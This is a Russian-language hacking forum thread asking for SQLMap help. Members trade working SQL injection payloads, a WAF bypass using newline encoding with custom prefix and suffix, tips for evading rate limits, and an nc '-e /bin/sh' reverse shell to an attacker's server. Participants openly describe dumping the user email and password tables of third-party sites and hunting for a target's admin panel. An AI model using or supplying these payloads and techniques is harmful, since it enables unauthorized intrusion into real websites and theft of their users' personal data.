Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    265
    Likes Received:
    12
    Reputations:
    1
    Такой вопрос сижу в бд под обычным юзерем.Есть лог пасс админа.Как подлючится к бд под рутом?
     
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    предположим есть скуль вида

    Code:
    ?id=7') union select 1,2,3,4
    
    waf блокирует запрос, но проверка не проверяет что строка многострочная, добавляем перенос строки %0A

    Code:
    ?id=7')%0A union select 1,2,3,4
    
    символы комментариев запрещены, а нам надо как то корректно закрыть запрос(открытую скобку), добавляем

    Code:
    ?id=7')%0A union select 1,2,3,4 and 1=('1
    
    чтобы объяснить это скульмапу используем
    --prefix="')%0A" --suffix="and 1=('1"

    примерно так, в общем prefix и suffix нужны для кастомизации запроса, prefix - вначале, suffix - в конце
     
    _________________________
    brown, spize0r, eminlayer7788 and 2 others like this.
  3. MollizZz

    MollizZz New Member

    Joined:
    20 Feb 2016
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Привет всем. Подскажите. Сегодня столкнулся с этим:
    [​IMG]
    Как можно это победить?
     
  4. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    265
    Likes Received:
    12
    Reputations:
    1
    charset
     
  5. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    265
    Likes Received:
    12
    Reputations:
    1
    [09:52:37] [INFO] testing connection to the target URL
    [09:52:37] [DEBUG] declared web page charset 'utf-8'
    [09:52:37] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401)
    [09:52:37] [WARNING] HTTP error codes detected during run:
    401 (Unauthorized) - 1 times

    Такая трабла,нашел скулю бурпом [ JSON parameter] причем бурп не видит никакой аундефикации и тд.пробую крутануть мапом вот такая ошибка.Кто сталкивался?Что делать?
     
    #405 brown, 14 May 2017
    Last edited: 14 May 2017
  6. MollizZz

    MollizZz New Member

    Joined:
    20 Feb 2016
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Суть проблемы. Лью хороший сайт. Льется медленно, но уверенно
    Периодически останавливаю и проверяю. Прошло уже процентов 20
    Но нет данных с колонки "mail"
    [​IMG]
    Собственно вопрос. Бывает так, что сначала сливает пассы, а потом мыла?

    p.s. Пишет так же такое: [WARNING] reflective value(s) found and filtering out и стоит на месте

    Code:
    Parameter: #1* ((custom) POST)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: search=if(now()=sysdate(),sleep(0),0)/'||(SELECT 'YgBm' FROM DUAL WHERE 2861=2861 AND (SELECT 1089 FROM(SELECT COUNT(*),CONCAT(0x7170627671,(SELECT (ELT(1089=1089
    ,1))),0x71716b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||''XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
    ---
    [12:21:59] [INFO] testing MySQL
    [12:21:59] [INFO] confirming MySQL
    [12:21:59] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.4.45
    back-end DBMS: MySQL >= 5.0.0
    [12:21:59] [INFO] fetching entries of column(s) 'email' for table 'user' in database 'SITE.COM'
    [12:21:59] [INFO] the SQL query used returns 182215 entries
    due to huge table size do you want to remove ORDER BY clause gaining speed over consistency? [y/N] N
    [12:21:59] [INFO] starting 10 threads
    [12:22:00] [INFO] heuristics detected web page charset 'windows-1252'
    [12:22:00] [WARNING] reflective value(s) found and filtering out
     
    #406 MollizZz, 16 May 2017
    Last edited: 16 May 2017
  7. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    265
    Likes Received:
    12
    Reputations:
    1

    Нет.Занчит в бд нет Емайлов
     
  8. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    265
    Likes Received:
    12
    Reputations:
    1
    '%2b(select convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(77)%2bCHAR(72)%2bCHAR(107)%2bCHAR(116)%2bCHAR(112)%2bCHAR(80)%2bCHAR(80)%2bCHAR(116)) FROM syscolumns)%2b'

    В чем может быть проблема?
    Обычный еррорбасед
     
  9. MollizZz

    MollizZz New Member

    Joined:
    20 Feb 2016
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Нет. В БД есть мыла. Ковырял в командах и в какой то момент начало их лить и сразу будто что то остановило дальнейший слив. Они как то защищены. И регистрация на этом сайте не возможна без почты
     
  10. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    типичный лимит запросов в минуту.
     
  11. MollizZz

    MollizZz New Member

    Joined:
    20 Feb 2016
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Подскажи выход?
     
  12. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    265
    Likes Received:
    12
    Reputations:
    1
    --delay --time-sec
     
  13. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    Подскажите по такому вопросу. Нужно раскрыть названия директорий в списке, в частности найти админку.
    Все способы перпробовал, вроде все закрыто. Но. При использовании SQLMAP можно получить путь к базе.
    Code:
    [13:12:11] [INFO] retrieving MySQL plugin directory absolute path
    [13:12:11] [INFO] resumed: /us\x81/lib64/mysql/plugin
    
    Сама уязвимость.
    Code:
    Parameter: id (GET)
        Type: stacked queries
        Title: MySQL > 5.0.11 stacked queries (comment)
        Payload: id=103;SELECT SLEEP(5)#&id=103
    
    Если отрывается путь к базе, значит можно и просканировать все папки подумал я.
    Начал использовать --os-shell.
    UDF вроде как создается
    Code:
    creating UDF 'sys_eval'
    creating UDF 'sys_exec'
    
    И, также при завершении os-shell, программа спрашивает:
    Code:
    [13:40:08] [INFO] cleaning up the database management system
    do you want to remove UDF 'sys_eval'? [Y/n] 
    НО команды в строке ничего не выводят, как только не делал
    Code:
    os-shell> namehost
    do you want to retrieve the command standard output? [Y/n/a] y
    [13:26:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
    No output
    Сообственно вопрос: если нашло путь к базе, хоть и долго мучало сервер, но нашло. Значит можно получить любые директории? Есть ли какие то мысли на этот счет?
     
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Это пути директории где по умолчанию находятся плагины. В ТОМ числе плагин, или как она ещё верно называется библиотека для мускул сервера что бы выполнить UDF. А значит , я смею предположить что ничего вы не нашли. Ну предположим, у вас слепое
    выполнение команд. На целевом сервере делаем запрос nc ((195,1,1,1)ip вашего сервера) 4444 -e /bin/sh . У себя на выделенным сервере nc -lvp 4444. В случаи успеха будет шелл. Но, я очень сомневаюсь что у вас что-то получиться. Удачи.
     
    #414 BabaDook, 18 May 2017
    Last edited: 18 May 2017
    spize0r likes this.
  15. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    Вопрос: почему нельзя искать любые директории если находит дир. библиотек, и почему нельзя записать шел на сервер, если пишет UDF ?
     
  16. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    А какие команды можно выполнять в строке os-shell> ?
    чтобы не получать:
    No output
     
  17. spize0r

    spize0r Member

    Joined:
    2 Apr 2016
    Messages:
    40
    Likes Received:
    12
    Reputations:
    4
    Блин ступлил, hostname и выполнял . Опечатался.
    Ничего не выводит. И все же непонятен вопрос почему он может сканировать путь к плагинам, а к другим файлам нет.
    Ведь если SQLMAP может найти этот путь, то и вывести список файлов по заданному пути в директории тоже есть вариант. Или нет?
     
  18. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Ребят подскажите

    Есть обычный ерор

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)

    Колонки с малым кол-во записей дампятся и тд и тп
    но в основной таблице с юзерами ,начинаю дамп , он пробует определить кол-во записей emai,password,salt и через секунд 10 идет редирект

    [14:56:50] [INFO] testing MySQL
    [14:56:50] [PAYLOAD] -2390
    [14:56:50] [WARNING] reflective value(s) found and filtering out
    [14:56:50] [DEBUG] resuming configuration option 'optimize' (True)
    [14:56:50] [DEBUG] performed 0 queries in 0.00 seconds
    [14:56:50] [INFO] confirming MySQL
    [14:56:50] [DEBUG] performed 0 queries in 0.00 seconds
    [14:56:50] [DEBUG] performed 0 queries in 0.00 seconds
    [14:56:50] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.0
    [14:56:50] [PAYLOAD] -5914' OR 1 GROUP BY CONCAT(0x7178767a71,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM vbforums.vb3_user),0x71786b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    sqlmap got a 302 redirect to 'https://www.site.com:443/'. Do you want to follow? [Y/n] n
    [14:57:04] [DEBUG] performed 1 queries in 13.98 seconds
    [14:57:04] [ERROR] unable to retrieve the number of entries for any table <<<<< лог по -v3

    что можно придумать ?

    Уже юзал no-cast --hex , пробывал ставить больше делей и тд и тп .

    t0ma5 взываю к тебе :)
     
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    оу, как лестно
    попробуй крутить сразу по https и c www
    попробуй дампить не все сразу, а частями, заюзав --where="id < 1000"
     
    _________________________
  20. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Все перепробовал ,не получается .

    Все как и было

    sqlmap got a 302 redirect to 'http://www.site:80/'. Do you want to follow? [Y/n] n
    [15:32:10] [ERROR] unable to retrieve the number of entries for any table